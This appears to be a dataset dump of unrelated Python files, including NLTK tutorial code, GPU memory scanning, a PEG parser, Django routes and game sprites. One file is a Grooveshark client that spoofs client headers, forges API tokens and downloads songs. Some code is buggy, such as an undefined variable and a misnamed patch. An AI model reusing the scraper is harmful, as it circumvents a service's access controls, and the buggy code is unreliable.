text stringlengths 8 6.05M |
|---|
import pytest, sys
sys.path.append("..")
from helpers_for_tests import run_args_on_parser as runargs
def add_config_to_args(args):
"""Helper function that puts the config subcommand add in front for dev convience"""
return [["config"] + arg for arg in args]
not_enough_args = [[], ["config_value"]]
not_enough_args = add_config_to_args(not_enough_args)
@pytest.mark.parametrize("args", not_enough_args)
def test_not_enough_args(args):
result = runargs(args)
assert "the following arguments are required" in result.err
|
import pyopencl as cl
import pyopencl.array
import numpy
import numpy.linalg as la
import time
HARD_LOCATIONS = 2**20
DIMENSIONS = 256
#BUFFER_SIZE_EXPECTED_ACTIVE_HARD_LOCATIONS = 1300 #Compute analytically; prove it's safe...
maximum = (2**32)-1
HASH_TABLE_SIZE = 25033
print "HASH_TABLE_SIZE=", HASH_TABLE_SIZE #WHAT IS THE OPTIMUM HASH_TABLE_SIZE??
ACCESS_RADIUS_THRESHOLD = 104 #COMPUTE EXPECTED NUMBER OF num_ACTIVE_locations_found HARD LOCATIONS
import scan_toolkit as ocl_scan
import os
import pyopencl.array as cl_array
SDM_addresses = ocl_scan.load_address_space()
print SDM_addresses[0,0]
numpy.random.seed(seed=12345678)
ctx = cl.create_some_context()
queue = cl.CommandQueue(ctx)
mem_flags = cl.mem_flags
OpenCL_code = ocl_scan.Get_Text_code ('GPU_Code_OpenCLv1_2.cl')
import os
import pyopencl.array as cl_array
os.environ['PYOPENCL_COMPILER_OUTPUT'] = '1'
#SDM_addresses = Create_Memory_Addresses()
print 'sending memory_addresses from host to compute device...'
memory_addresses_gpu = cl_array.to_device(queue, SDM_addresses)
distances_host = ocl_scan.Get_Hamming_Distances()
distances_gpu = ocl_scan.Get_Distances_GPU_Buffer(ctx)
prg = cl.Program(ctx, OpenCL_code).build()
num_times = 200
start = time.time()
for x in range(num_times):
bitstring = ocl_scan.Get_Random_Bitstring()
bitstring_gpu = ocl_scan.Get_Bitstring_GPU_Buffer(ctx, bitstring) #Optimize THIS!
count, active_hard_locations, distances = ocl_scan.Get_Active_Locations5(ctx, bitstring_gpu)
#active_hard_locations = Get_Active_Locations2(ctx)
#write_x_at_x_kanerva(active_hard_locations,bitstring)
#distances = Get_Active_Locations2(ctx)
Results_and_Statistics[x] = active_hard_locations.size
time_elapsed = (time.time()-start)
print Results_and_Statistics[Results_and_Statistics !=0].min(), " the minimum of HLs found should be 1001"
print Results_and_Statistics[Results_and_Statistics !=0].mean(), "the mean of HLs found should be 1119.077"
print Results_and_Statistics[Results_and_Statistics !=0].max(), "the max of HLs found should be 1249"
print '\n Seconds to Scan 2^20 Hard Locations', num_times,'times:', time_elapsed
print distances
print active_hard_locations
print active_hard_locations.size
sum = numpy.sum(Results_and_Statistics)
|
import pyodbc
import CRUDController
import datetime
import random
from faker import Faker
"""
Controller Operator class, it's responsible for generating huge amount of data.
"""
class ControllerOperator:
controller = ''
fake = ''
def __init__(self, db):
self.controller = CRUDController.Controller(db)
self.fake = Faker()
def close(self):
self.controller.close()
def insert_participants(self, amount):
for i in range(amount):
try:
self.controller.create_participant()
except pyodbc.ProgrammingError:
print('Weird name')
except pyodbc.IntegrityError:
print('Constraint')
def insert_companies(self, amount):
for i in range(amount):
try:
self.controller.create_company()
except pyodbc.ProgrammingError:
print('Weird name')
except pyodbc.IntegrityError:
print('Constraint')
def insert_individuals(self, amount):
for i in range(amount):
try:
self.controller.create_individual()
except pyodbc.ProgrammingError:
print('Weird name')
except pyodbc.IntegrityError:
print('Constraint')
def get_all_customers(self):
return self.controller.get_all_customers()
def get_all_workshops(self):
return self.controller.get_all_workshops()
def get_all_participants(self):
return self.controller.get_all_participants()
def get_all_conferences(self):
return self.controller.get_all_conferences()
def insert_conference(self, date):
name = self.fake.company()
name = ''.join(name.split(','))
print(name)
description = self.fake.text()
price_per_date = random.randint(5, 10) * 10
self.controller.create_conference(name, description, date, price_per_date)
def generate_conferences(self, n, start_date):
date = start_date
for i in range(n):
self.insert_conference(date)
date += datetime.timedelta(days=random.randint(15, 18))
def create_company_booking(self):
company_id = self.controller.get_random_company_id()
self.controller.create_conference_booking(company_id)
def generate_company_bookings(self, n):
for i in range(n):
self.create_company_booking()
def create_individual_booking(self):
individual_id = self.controller.get_random_individual_id()
self.controller.create_conference_booking(individual_id)
def generate_individual_bookings(self, n):
for i in range(n):
self.create_individual_booking()
|
# Copyright 2012 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
import errno
import re
import subprocess
from portage import os
from portage import _unicode_encode, _encodings
from portage.const import MANIFEST2_IDENTIFIERS
from portage.util import (atomic_ofstream, grablines,
shlex_split, varexpand, writemsg)
from portage.util._async.PopenProcess import PopenProcess
from _emerge.CompositeTask import CompositeTask
from _emerge.PipeReader import PipeReader
from .ManifestProcess import ManifestProcess
class ManifestTask(CompositeTask):
__slots__ = ("cp", "distdir", "fetchlist_dict", "gpg_cmd",
"gpg_vars", "repo_config", "force_sign_key", "_manifest_path")
_PGP_HEADER = b"BEGIN PGP SIGNED MESSAGE"
_manifest_line_re = re.compile(r'^(%s) ' % "|".join(MANIFEST2_IDENTIFIERS))
_gpg_key_id_re = re.compile(r'^[0-9A-F]*$')
_gpg_key_id_lengths = (8, 16, 24, 32, 40)
def _start(self):
self._manifest_path = os.path.join(self.repo_config.location,
self.cp, "Manifest")
manifest_proc = ManifestProcess(cp=self.cp, distdir=self.distdir,
fetchlist_dict=self.fetchlist_dict, repo_config=self.repo_config,
scheduler=self.scheduler)
self._start_task(manifest_proc, self._manifest_proc_exit)
def _manifest_proc_exit(self, manifest_proc):
self._assert_current(manifest_proc)
if manifest_proc.returncode not in (os.EX_OK, manifest_proc.MODIFIED):
self.returncode = manifest_proc.returncode
self._current_task = None
self.wait()
return
modified = manifest_proc.returncode == manifest_proc.MODIFIED
sign = self.gpg_cmd is not None
if not modified and sign:
sign = self._need_signature()
if not sign and self.force_sign_key is not None \
and os.path.exists(self._manifest_path):
self._check_sig_key()
return
if not sign or not os.path.exists(self._manifest_path):
self.returncode = os.EX_OK
self._current_task = None
self.wait()
return
self._start_gpg_proc()
def _check_sig_key(self):
null_fd = os.open('/dev/null', os.O_RDONLY)
popen_proc = PopenProcess(proc=subprocess.Popen(
["gpg", "--verify", self._manifest_path],
stdin=null_fd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT),
pipe_reader=PipeReader())
os.close(null_fd)
popen_proc.pipe_reader.input_files = {
"producer" : popen_proc.proc.stdout}
self._start_task(popen_proc, self._check_sig_key_exit)
@staticmethod
def _parse_gpg_key(output):
"""
Returns the first token which appears to represent a gpg key
id, or None if there is no such token.
"""
regex = ManifestTask._gpg_key_id_re
lengths = ManifestTask._gpg_key_id_lengths
for token in output.split():
m = regex.match(token)
if m is not None and len(m.group(0)) in lengths:
return m.group(0)
return None
@staticmethod
def _normalize_gpg_key(key_str):
"""
Strips leading "0x" and trailing "!", and converts to uppercase
(intended to be the same format as that in gpg --verify output).
"""
key_str = key_str.upper()
if key_str.startswith("0X"):
key_str = key_str[2:]
key_str = key_str.rstrip("!")
return key_str
def _check_sig_key_exit(self, proc):
self._assert_current(proc)
parsed_key = self._parse_gpg_key(
proc.pipe_reader.getvalue().decode('utf_8', 'replace'))
if parsed_key is not None and \
self._normalize_gpg_key(parsed_key) == \
self._normalize_gpg_key(self.force_sign_key):
self.returncode = os.EX_OK
self._current_task = None
self.wait()
return
if self._was_cancelled():
self.wait()
return
self._strip_sig(self._manifest_path)
self._start_gpg_proc()
@staticmethod
def _strip_sig(manifest_path):
"""
Strip an existing signature from a Manifest file.
"""
line_re = ManifestTask._manifest_line_re
lines = grablines(manifest_path)
f = None
try:
f = atomic_ofstream(manifest_path)
for line in lines:
if line_re.match(line) is not None:
f.write(line)
f.close()
f = None
finally:
if f is not None:
f.abort()
def _start_gpg_proc(self):
gpg_vars = self.gpg_vars
if gpg_vars is None:
gpg_vars = {}
else:
gpg_vars = gpg_vars.copy()
gpg_vars["FILE"] = self._manifest_path
gpg_cmd = varexpand(self.gpg_cmd, mydict=gpg_vars)
gpg_cmd = shlex_split(gpg_cmd)
gpg_proc = PopenProcess(proc=subprocess.Popen(gpg_cmd))
self._start_task(gpg_proc, self._gpg_proc_exit)
def _gpg_proc_exit(self, gpg_proc):
if self._default_exit(gpg_proc) != os.EX_OK:
self.wait()
return
rename_args = (self._manifest_path + ".asc", self._manifest_path)
try:
os.rename(*rename_args)
except OSError as e:
writemsg("!!! rename('%s', '%s'): %s\n" % rename_args + (e,),
noiselevel=-1)
try:
os.unlink(self._manifest_path + ".asc")
except OSError:
pass
self.returncode = 1
else:
self.returncode = os.EX_OK
self._current_task = None
self.wait()
def _need_signature(self):
try:
with open(_unicode_encode(self._manifest_path,
encoding=_encodings['fs'], errors='strict'), 'rb') as f:
return self._PGP_HEADER not in f.readline()
except IOError as e:
if e.errno in (errno.ENOENT, errno.ESTALE):
return False
raise
|
# coding: utf-8
# #Introduction au TALN en python
# ###Représentation du texte:
# In[1]:
s1 = 'Bonjour tout le monde'
#print s1
# In[2]:
print s1
# In[3]:
s2 = "Hello world"
print s2
# ### une string est vu comme un array, alors on peut voir sa longeur et acceder aux éléments par des index
# In[5]:
print len(s2)
# In[6]:
print s1[0]
# In[8]:
s1[0:9]
# In[6]:
print s1[5:]
# In[34]:
print s1[:7]
# ### De la même façon que R, python nous permet de convertir les charactères en minuscules ou majuscules
# In[7]:
s3 = s1.upper()
print s3
# In[9]:
s4 = s3.lower()
print s4
# In[10]:
print s4.find('o')
# ###Comme dans d'autres langages de programmation, la concatenation se fait en utilisant l'opérateur "+"
# In[23]:
s1 = 'Bonjour'
s2 = 'tout'
s3 = 'le'
s4 = 'monde'
s5 = s1+s2+s3+s4
print s5
# In[24]:
s0 = ' '
s6 = s1+s0+s2+s0+s3+s0+s4
print s6
# #### opérateur *
#
# In[25]:
s7 = s6*3
print s7
# Pour le traitement de texte, on préfère avoir une phrase comme une liste de strings
# In[33]:
s1 = "L'essentiel est \"invisible\" pour les yeux."
s1 = s1.upper()
# In[34]:
print s1
print len(s1)
# In[35]:
s1 = s1.split()
print s1
# ### Les mots sont représentés par des strings
# ### les phrases on va les représenter par des listes de strings
# In[26]:
print s1.index('pour')
# In[28]:
print 'est' in s1
# In[29]:
print len(s1)
# ###Normaliser le text
# In[36]:
s1_min = [w.lower() for w in s1]
print s1_min
# In[37]:
s6 = 'Bonjour'
# In[42]:
s6.endswith('oul')
# # NLTK : Natural language tool kit
#
# In[43]:
import nltk
# In[44]:
s1 = 'Hello, my name is Erick'
s2 = s1.split()
# In[45]:
print s2
# ## Tokenization avec nltk
# In[47]:
nltk.word_tokenize(s1)
# ####Quelle est la différence antre le tokenizer de nltk et la fonction split d'un string?
# ###Les stopwords
# In[48]:
from nltk.corpus import stopwords
# In[49]:
frenchStopWords = stopwords.words('french')
englishStopWords = stopwords.words('english')
spanishStopWords = stopwords.words('spanish')
# In[50]:
def printListOfWords(listOfWords):
for w in listOfWords:
print w
return
# In[ ]:
# In[6]:
#printListOfWords(frenchStopWords)
# In[ ]:
# In[5]:
#printListOfWords(spanishStopWords)
# In[4]:
#printListOfWords(englishStopWords)
# In[54]:
from nltk.book import *
# In[138]:
#print text7.tokens
# ###Compter le vocabulaire:
# In[122]:
#print text7.tokens
# In[123]:
print text7.count('said')
# ###Distribution de la frequence des mots
# In[60]:
frecList = FreqDist(text7)
frecList ## les outcomes c'est le nombre de mots
# In[61]:
vocabulary = frecList.keys()
print vocabulary[:50]
# In[62]:
frecList.plot(50,cumulative=False)
# ## mais le graphe montre beaucoup de stop words... alors que peut-on faire?
# In[63]:
# 1 on normalise le text
text7_m = [w.lower() for w in text7]
# In[139]:
#print text7_m
# In[64]:
text7_SansStW = [w for w in text7_m if w not in englishStopWords]
# In[65]:
frecList2 = FreqDist(text7_SansStW,)
# In[66]:
vocabulary2 = frecList2.keys()
# In[3]:
#vocabulary2[:50]
# In[68]:
frecList2.plot(50,cumulative=False)
# ##Les stemmers en python
# In[70]:
from nltk.stem.porter import *
# In[ ]:
# In[71]:
stemmer = PorterStemmer()
# In[72]:
plurals = ['caresses', 'flies', 'dies', 'mules', 'denied',
'died', 'agreed', 'owned', 'humbled', 'sized',
'meeting', 'stating', 'siezing', 'itemization',
'sensational', 'traditional', 'reference', 'colonizer',
'plotted']
singular = []
# In[73]:
for plural in plurals:
singular.append(stemmer.stem(plural))
# In[74]:
print singular
# In[75]:
from nltk.stem.snowball import SnowballStemmer
# In[76]:
print(" ".join(SnowballStemmer.languages))
# In[77]:
steemerFr = SnowballStemmer("french")
# In[78]:
steemerFr.stem('finissons')
# In[83]:
steemerFr.stem(u'chats')
# ##Lemmatizer de WordNet
# In[84]:
wnl = nltk.WordNetLemmatizer()
# In[85]:
[wnl.lemmatize(t) for t in plurals]
# In[86]:
wnl.lemmatize('lions')
# ##Étiquetage de classes lexicales
# In[87]:
text = "Jonh gave the book to Anne"
text = nltk.word_tokenize(text)
print text
# In[88]:
tag_text = nltk.pos_tag(text)
# In[94]:
tag_text[0][1]
# In[89]:
text7_pos = nltk.pos_tag(text7_SansStW)
# In[1]:
#print text7_pos
#choses_elever = [',','%']
# In[117]:
#[w for w in text7_m if w not in englishStopWords]
verbs_t = [t for t in text7_pos if t[1].startswith('M')]
# In[2]:
#print verbs_t
# In[119]:
verbs =[w[0] for w in verbs_t]
# In[120]:
frecVerbs = FreqDist(verbs)
# In[121]:
frecVerbs.plot(50,cumulative=False)
# In[161]:
frecVebsK = frecVerbs.keys()
# In[101]:
nouns_t = [t for t in text7_pos if t[1].startswith('N')]
print len(nouns_t)
nouns =[w[0] for w in nouns_t]
frecNouns = FreqDist(nouns)
frecNouns.plot(50, cumulative=False)
# Regarder la référence: Natural language processing with Python, by Steven Bird, Ewan Klein, and Edward Loper
# In[ ]:
|
import os
import functools
import hashlib
import json
import random
import uuid
import urllib
from twisted.python import runtime, log
from twisted.internet import defer
from twisted.web import error, client
# Always use https, since getting a token requires it.
API_URL = "https://cowbell.grooveshark.com/"
ART_BASE_URL = "http://beta.grooveshark.com/static/amazonart/m"
class JSONFault(Exception): pass
### TWISTED MONKEY PATCHING
### SHIELD YOUR EYES, #twisted!
# HTTPClient, when using afterFoundGet on a 302
# handles 301 twice, leaving to two requests
# to the server
def stupid_bug_handleStatus_302(self):
if self.afterFoundGet:
self.handleStatus_303()
else:
self.handleStatus_301()
client.HTTPPageGetter.handleStatus203 = stupid_bug_handleStatus_302
# I have to do this because downloadPage/HTTPDownloader
# doesn't support afterFoundGet, which is required
# to download from the Akamai servers
def stupid_bug_HTTPDownloader(factory=client.HTTPDownloader):
def inner(*a, **kw):
I = factory(*a, **kw)
I.afterFoundGet = True
return I
return inner
client.HTTPDownloader = stupid_bug_HTTPDownloader()
class GroovesharkAPI(object):
def __init__(self, url=API_URL):
self.url = url
# ok, I'm just copying the stuff from the requests.
self.headers = dict(client="gslite", clientRevision="20100412.85",
privacy=1, uuid=str(uuid.uuid4()).upper())
# Content-Type headers for usual stuff.
self.jsonContent = {"Content-Type":"application/json"}
self.formContent = {"Content-Type":"application/x-www-form-urlencoded"}
# shhh...
self.httpHeaders = {"User-Agent":"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.8) Gecko/20100721 Firefox/3.6.8"}
# Token expiration date.
self.tokenExpire = None
self.country = None
@defer.inlineCallbacks
def initialize(self):
yield self.fetchSessionID()
yield self.fetchToken()
# I'm not sure if you *need* a country,
# but the official client uses it.
yield self.fetchCountry()
def getURL(self, script, *args, **kwargs):
return "%s%s?%s%s" % (self.url, script,
'&'.join(map(urllib.quote, args)), urllib.urlencode(kwargs))
@defer.inlineCallbacks
def fetchSessionID(self):
cookies = dict()
result = yield client.getPage(self.url, method="POST", cookies=cookies)
self.headers['session'] = cookies['PHPSESSID']
self.httpHeaders['Cookie'] = "PHPSESSID=%s" % (cookies['PHPSESSID'],)
@defer.inlineCallbacks
def fetchToken(self):
self.rawToken = yield self.send('getCommunicationToken',
dict(secretKey=hashlib.md5(self.headers['session']).hexdigest()),
tokenRequired=False)
self.tokenExpire = runtime.seconds() + 25000
@defer.inlineCallbacks
def fetchCountry(self):
self.country = yield self.send('getCountry', script="more.php")
@defer.inlineCallbacks
def generateCallToken(self, action):
if runtime.seconds() > self.tokenExpire:
yield self.fetchToken()
seed = "%06x" % random.getrandbits(24)
defer.returnValue(seed + hashlib.sha1("%s:%s:quitStealinMahShit:%s" % (
action, self.rawToken, seed)).hexdigest())
@defer.inlineCallbacks
def send(self, action, params=None, script="service.php", tokenRequired=True):
headers = dict(self.headers)
dataDict = dict(method=action, parameters=params, header=headers)
if self.country:
params['country'] = self.country
if tokenRequired:
dataDict['header']['token'] = yield self.generateCallToken(action)
dataJSON = json.dumps(dataDict)
resultJSON = yield client.getPage(self.getURL(script, action), method="POST",
headers=dict(self.httpHeaders, **self.jsonContent), postdata=dataJSON)
resultDict = json.loads(resultJSON)
result = resultDict.get('result')
if result is not None:
defer.returnValue(result)
fault = JSONFault(resultDict['fault']['message'])
fault.code = resultDict['fault']['code']
raise fault
@defer.inlineCallbacks
def search(self, query, type="Songs"):
result = yield self.send('getSearchResultsEx',
dict(query=query, type=type), "more.php")
result = result['result']
defer.returnValue(result)
@defer.inlineCallbacks
def getStreamingInfo(self, songID):
result = yield self.send('getStreamKeyFromSongIDEx',
dict(songID=songID, prefetch=False, mobile=False), "more.php")
defer.returnValue(result)
def downloadSong(self, streamingInfo, filename):
if streamingInfo not in ([], None): # For unplayable songs in the web client
url = "http://%s/stream.php" % str(streamingInfo['ip'])
postdata = "streamKey=" + str(streamingInfo['streamKey'])
return client.downloadPage(url, filename, client.HTTPDownloader,
method="POST", postdata=postdata, headers=self.formContent)
return defer.succeed(True)
def downloadCoverArt(self, coverArtFilename, filename):
_, extension = os.path.splitext(coverArtFilename)
if coverArtFilename not in (u'None', u'False'):
return client.downloadPage(ART_BASE_URL + str(coverArtFilename),
filename + extension)
def downloadSongID(self, songID, filename):
print ("Downloading %s to %s" % (songID, filename))
return self.getStreamingInfo(songID).addCallbacks(
functools.partial(self.downloadSong, filename=filename))
def downloadSongInfo(self, songInfo, filename, artFilename=None):
songID = songInfo[u'SongID']
L = []
if artFilename and songInfo.get(u'CoverArtFilename'):
d = self.downloadCoverArt(songInfo[u'CoverArtFilename'],
artFilename)
if d: L.append(d)
L.append(self.downloadSongID(songID, filename))
return defer.DeferredList(L)
@defer.inlineCallbacks
def getPlaylist(self, playlistID):
result = yield self.send('playlistGetSongs',
dict(playlistID=playlistID), "more.php")
defer.returnValue(result['Songs'])
|
import pygame
class Platform(pygame.sprite.Sprite):
'''
Класс платформ
Переменные класса содержат информацию о размерах создаваемых блоков
'''
width = 32
height = 32
def __init__(self, x, y):
pygame.sprite.Sprite.__init__(self)
self.color = "#FF6262"
try:
self.image = pygame.image.load("img/block/platform.png")
except pygame.error:
self.image = pygame.Surface((self.width, self.height))
self.image.fill(pygame.Color(self.color))
self.rect = pygame.Rect(x, y, self.width, self.height)
class Gate(pygame.sprite.Sprite):
'''
Класс портала
Переменные класса аналогичны переменным класса платформ
'''
width = 32
height = 32
def __init__(self, x, y):
pygame.sprite.Sprite.__init__(self)
self.color = "#FFFFFF"
try:
self.image = pygame.image.load("img/block/gate.png")
self.image = pygame.transform.scale(self.image, (32, 32))
except pygame.error:
self.image = pygame.Surface((self.width, self.height))
self.image.fill(pygame.Color(self.color))
self.rect = pygame.Rect(x, y, self.width, self.height) |
from django.conf.urls import url
from rest_framework.authtoken import views as drf_views
from . import views
app_name = 'Rank'
urlpatterns = [
#auth/
url(r'^auth/$', drf_views.obtain_auth_token, name='auth'),
#ranktank/signin
url(r'^isloggedin/$',views.IsLoggedIn.as_view(), name = 'is-logged-in'),
#ranktank/signup
url(r'^signup/$',views.SignUp.as_view(), name = 'sign-up'),
#ranktank/signin
url(r'^signin/$',views.SignIn.as_view(), name = 'sign-in'),
#ranktank/new_contest
url(r'^new_contest/$',views.NewContest.as_view(), name = 'new_contest'),
#ranktank/new_private_contest
url(r'^new_private_contest/$',views.NewPrivateContest.as_view(), name = 'new_private_contest'),
#ranktank/rank_vote
url(r'^rank_vote/(?P<url>\w+)/$',views.RankVote.as_view(), name = 'rank_vote'),
#ranktank/rank_vote
url(r'^rank_result/(?P<url>\w+)/$',views.RankResult.as_view(), name = 'rank_result'),
#ranktank/private_randk_vote
url(r'^rank_private_vote/(?P<url>\w+)/$',views.RankPrivateVote.as_view(), name = 'rank_private_vote'),
#ranktank/rank_vote
url(r'^my_rtlist/$',views.MyRTList.as_view(), name = 'my-rtlist'),
#ranktank/my_admin
url(r'^my_admin/$',views.MyAdmin.as_view(), name = 'my-admin'),
#iwansell/rank_title
url(r'^rank_title/(?P<url>\w+)/$',views.RankTitle.as_view(), name = 'rank-title'),
#iwansell/rank_tanker
url(r'^rank_tanker/(?P<url>\w+)/$',views.RankTanker.as_view(), name = 'rank-tanker'),
#iwansell/private_rank_title
url(r'^private_rank_title/(?P<url>\w+)/$',views.PrivateRankTitle.as_view(), name = 'private-rank-title'),
#iwansell/forgot_password
url(r'^forgot_password/$',views.ResetPasswordEmail.as_view(), name = 'reset-password-email'),
] |
import numpy as np
import cv2 as cv
import pandas as pd
import random
from math import ceil
from sklearn.utils import shuffle
dt = np.dtype(np.float32)
def generator(batch_size=50):
while True:
for j in range(batch_size):
Xs = []
Ys = []
count = 0
while count < 100:
day_or_night = random.randint(0,1)
if day_or_night == 0:
folder_day = random.randint(1,13)
path_0 = '/../data/archive/Annotations/Annotations/dayTrain/dayClip{}/frameAnnotationsBOX.csv'.format(folder_day)
csv_file = pd.read_csv(filepath_or_buffer=path_0, sep=';')
else:
folder_night = random.randint(1,5)
path_0 = '/../data/archive/Annotations/Annotations/nightTrain/nightClip{}/frameAnnotationsBOX.csv'.format(folder_night)
csv_file = pd.read_csv(filepath_or_buffer=path_0, sep=';')
# choose picture
i = random.randint(0, len(csv_file.iloc[:,0].unique())-1) # choose random number of picture in folder
full_pic_name = csv_file.iloc[:,0].unique()[i] # with index above choose full name picture
pic_name = csv_file.iloc[:,0].unique()[i].split('/')[1] # with index above choose picture
if day_or_night == 0:
path_to_img = '/../data/archive/dayTrain/dayTrain/dayClip{}/frames/'.format(folder_day) + pic_name
else:
path_to_img = '/../data/archive/nightTrain/nightTrain/nightClip{}/frames/'.format(folder_night) + pic_name
img = cv.imread(path_to_img)
img = cv.cvtColor(img, cv.COLOR_BGR2RGB)
# find coordinates
number_of_same_pic = len(csv_file[csv_file.iloc[:,0] == full_pic_name].iloc[:,0]) # how many pic with same name
img = cv.copyMakeBorder(img, 200, 200, 200, 200, cv.BORDER_REPLICATE)
# blobbing
params = cv.SimpleBlobDetector_Params()
params.minThreshold = 1
params.maxThreshold = 255
params.filterByArea = True
params.minArea = 100
params.filterByCircularity = False
params.filterByConvexity = False
params.filterByInertia = False
detector = cv.SimpleBlobDetector_create(params)
keypoints = detector.detect(img)
kps = np.array([key for key in keypoints])
for i in range(number_of_same_pic):
if count < 100:
# coors of box
x1 = csv_file[csv_file.iloc[:,0] == full_pic_name].iloc[i,2]+200
y1 = csv_file[csv_file.iloc[:,0] == full_pic_name].iloc[i,3]+200
x2 = csv_file[csv_file.iloc[:,0] == full_pic_name].iloc[i,4]+200
y2 = csv_file[csv_file.iloc[:,0] == full_pic_name].iloc[i,5]+200
# condition for keypoins which are not boxes - TAKES MUCH TIME
for key in keypoints:
keypoints = [key for key in keypoints if not ((x1-50 < key.pt[0] < x2+50) and (y1-50 < key.pt[1] < y2+50))]
random_crop_x1 = random.randint(0, 200-(x2-x1))
random_crop_x2 = 200 - random_crop_x1
random_crop_y1 = random.randint(0, 200-(y2-y1))
random_crop_y2 = 200 - random_crop_y1
cropped_img = img[y1-random_crop_y1:y2+random_crop_y2, x1-random_crop_x1:x2+random_crop_x2]
new_x1 = random_crop_x1
new_y1 = random_crop_y1
new_x2 = new_x1 + (x2-x1)
new_y2 = new_y1 + (y2-y1)
w = cropped_img.shape[1]
h = cropped_img.shape[0]
Rx = (64 / w)
Ry = (64 / h)
x1 = ceil(new_x1*Rx)
y1 = ceil(new_y1*Ry)
x2 = ceil(new_x2*Rx)
y2 = ceil(new_y2*Ry)
cropped_img = cv.resize(cropped_img, (64, 64))
cropped_img = cropped_img.reshape(1, 64, 64, 3)
box = np.array([1, x1, y1, x2, y2], dtype=dt)
Xs.append(np.array(cropped_img, dtype=dt) / 255.), Ys.append(box)
count += 1
keypoints = keypoints[-5:-1]
for k in range(len(keypoints)):
if count < 100:
k_x1 = int(round(keypoints[k].pt[0]-100))
k_y1 = int(round(keypoints[k].pt[1]-100))
k_x2 = int(round(keypoints[k].pt[0]+100))
k_y2 = int(round(keypoints[k].pt[1]+100))
cropped_img = img[k_y1:k_y2, k_x1:k_x2]
cropped_img = cv.resize(cropped_img, (64, 64))
cropped_img = cropped_img.reshape(1, 64, 64, 3)
box = np.array([0, 0, 0, 0, 0], dtype=dt)
Xs.append(np.array(cropped_img, dtype=dt) / 255.), Ys.append(box)
count += 1
Xs, Ys = shuffle(Xs, Ys)
yield Xs, Ys
|
"""
Exploring making tree parsing central.
"""
import re
# Some derived combinators
def invert(p): return cond(p, fail, succeed)
def either(p, q): return cond(p, p, q)
def both(p, q): return cond(p, q, fail)
def feed(p, f): return alter(p, lambda *vals: (f(*vals),))
def maybe(p): return either(p, succeed)
def plus(p): return chain(p, star(p))
def star(p): return recur(lambda p_star: maybe(chain(p, p_star)))
def recur(fn):
p = delay(lambda: fn(p))
return p
# Peg objects
def Peg(x):
if isinstance(x, _Peg): return x
# if isinstance(x, (str, unicode)): return literal(x)
if callable(x): return satisfying(x)
raise ValueError("Not a Peg", x)
class _Peg(object):
def __init__(self, run):
self.run = run
def __call__(self, sequence):
for vals, _ in self.run(sequence):
return vals
return None
def __add__(self, other): return chain(self, Peg(other))
def __radd__(self, other): return chain(Peg(other), self)
def __or__(self, other): return either(self, Peg(other))
def __ror__(self, other): return either(Peg(other), self)
__rshift__ = feed
__invert__ = invert
maybe = maybe
plus = plus
star = star
# Basic combinators
nil = ['nil']
fail = _Peg(lambda s: [])
succeed = _Peg(lambda s: [((), s)])
## anything('hi')
#. ('hi',)
## chain(anything, succeed)('hi')
#. ('hi',)
def cond(p, q, r):
def run(s):
pv = p.run(s)
choice = q if pv else r
if choice is p: return pv # (an optimization)
else: return choice.run(s)
return _Peg(run)
def satisfying(ok):
"Eat a subject s when ok(s), producing (s,)."
return _Peg(lambda s: [((s,), nil)] if s is not nil and ok(s) else [])
def chain(p, q):
return _Peg(lambda s: [(pvals + qvals, qnub)
for pvals, pnub in p.run(s)
for qvals, qnub in q.run(pnub)])
def alter(p, f):
return _Peg(lambda s: [(f(*vals), nub)
for vals, nub in p.run(s)])
def delay(thunk):
def run(s):
q.run = Peg(thunk()).run
return q.run(s)
q = _Peg(run)
return q
def item(p):
"Eat the first item of a sequence, iff p matches it."
def run(s):
if s is nil: return []
try: first = s[0]
except IndexError: return []
except TypeError: return []
except KeyError: return []
return [(vals, s[1:]) for vals, _ in p.run(first)]
return _Peg(run)
def match(regex, flags=0):
compiled = re.compile(regex, flags)
return _Peg(lambda s:
[] if s is nil
else [(m.groups(), s[m.end():])
for m in [compiled.match(s)] if m])
def capture(p):
def run(s):
for vals, nub in p.run(s):
# XXX use the position change instead, once we're tracking that:
if s is not nil and nub is not nil:
i = len(s) - len(nub)
if s[i:] == nub:
return [((s[:i],), nub)]
raise Exception("Bad capture")
return []
return _Peg(run)
## capture(match('h..') + match('.'))('hi there')
#. ('hi t',)
## capture(item(anything) + item(anything))([3])
## capture(item(anything) + item(anything))([3, 1])
#. ([3, 1],)
# More derived combinators
## startswith('hi')('hi there')
#. ()
def startswith(s): return match(re.escape(s))
anything = satisfying(lambda s: True)
def literal(c): return drop(satisfying(lambda s: c == s))
def drop(p): return alter(p, lambda *vals: ())
end = invert(item(anything)) # Hmmm
def an_instance(type_):
return satisfying(lambda x: isinstance(x, type_))
def alt(*ps):
if not ps: return fail
if not ps[1:]: return ps[0]
return either(ps[0], alt(*ps[1:]))
def items(*ps):
if not ps: return end
return chain(item(ps[0]), items(*ps[1:]))
def seq(*ps):
if not ps: return succeed
return chain(ps[0], seq(*ps[1:]))
give = lambda c: feed(succeed, lambda: c)
# Examples
from operator import *
## fail(42)
## anything(42)
#. (42,)
## chain(item(literal(5)), item(literal(0)))([5, 0, 2])
#. ()
## an_instance(int)(42)
#. (42,)
calc = delay(lambda:
alt(feed(items(literal('+'), calc, calc), add),
feed(items(literal('-'), calc, calc), sub),
an_instance(int)))
## calc(42)
#. (42,)
## calc(['-', 3, 1])
#. (2,)
## calc(['+', ['-', 2, 1], 3])
#. (4,)
singleton = lambda v: (v,)
cat = lambda *lists: sum(lists, ())
flatten1 = delay(lambda:
alt(seq(item(literal('+')), star(item(flatten1)), end),
an_instance(int)))
## flatten1(['+', ['+', ['+', 1, ['+', 2]]]])
#. (1, 2)
## flatten1(42)
#. (42,)
## flatten1(['+'])
#. ()
## flatten1(['+', 42])
#. (42,)
## flatten1(['+', 42, 43])
#. (42, 43)
## chain(item(literal('+')), anything)(['+', 42])
#. ([42],)
## star(item(anything))([1,2,3])
#. (1, 2, 3)
## star(match('hi() '))('hi hi hi there')
#. ('', '', '')
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
# Created By Liang Jun Copyright owned
import sys,os
import cv2 as cv
import numpy as np
from sklearn.neural_network import MLPClassifier
from sklearn import svm
from sklearn.metrics import confusion_matrix, precision_recall_fscore_support
from sklearn.model_selection import train_test_split
import pickle
def predictForData(model,targetData,labels):
y_pred = model.predict(targetData);
accuracy = model.score(targetData, labels);
Cm = confusion_matrix(labels, y_pred);
